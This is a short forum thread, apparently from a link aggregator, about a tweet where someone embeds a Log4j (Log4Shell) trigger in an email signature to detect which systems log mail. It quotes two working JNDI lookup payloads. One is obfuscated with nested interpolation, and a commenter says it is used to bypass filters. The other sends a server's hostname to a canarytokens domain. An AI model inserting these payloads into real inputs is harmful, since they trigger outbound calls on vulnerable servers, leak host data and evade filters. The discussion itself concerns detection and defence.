"Log4j trigger in my signature so I can see logging copies of my mail"(twitter.com)
twitter.com
"Log4j trigger in my signature so I can see logging copies of my mail"
https://twitter.com/moyix/status/1471714222358814721
7 comments
Lots of mail gateways / mail security appliances do DNS lookups of URLs in the message body in order to check domain reputation and filter phishing links. It looks like he's using a DNS canary token which would be triggered by those as well.
Yep, see later in the thread for how I'm avoiding that now; basically it uses a second level of interpolation so that it will only expand to the token when log4j is expanding it:
${jndi:ldap://${::-t}${::-o}${::-k}${::-e}${::-n}/a}
I stole this trick from my Apache logs; people are using it to bypass dumb filters that just trigger on "jndi:ldap".The fact this apparently triggers an error in Reddit is freaking hilarious.
Many WAFs now block HTTP requests that will exploit it. Cloudflare (not what Reddit uses) does it for all customers automatically, for example.
I was going to write that this will likely not find much - because, even if someone was scanning your email, who would be stupid enough to log the complete body - but... nevermind...
Seems like the author is using CanaryToken. I wonder if I can use it to set up a canary email to improve my spam blocklists...
https://www.canarytokens.org
https://www.canarytokens.org
It looks like canarytokens has explicitly added generating log4shell tokens to their drop-down. E.g.:
${jndi:ldap://x${hostName}.L4J.qtwtesuzkqtu5wpklv4f2p2b2.canarytokens.com/a}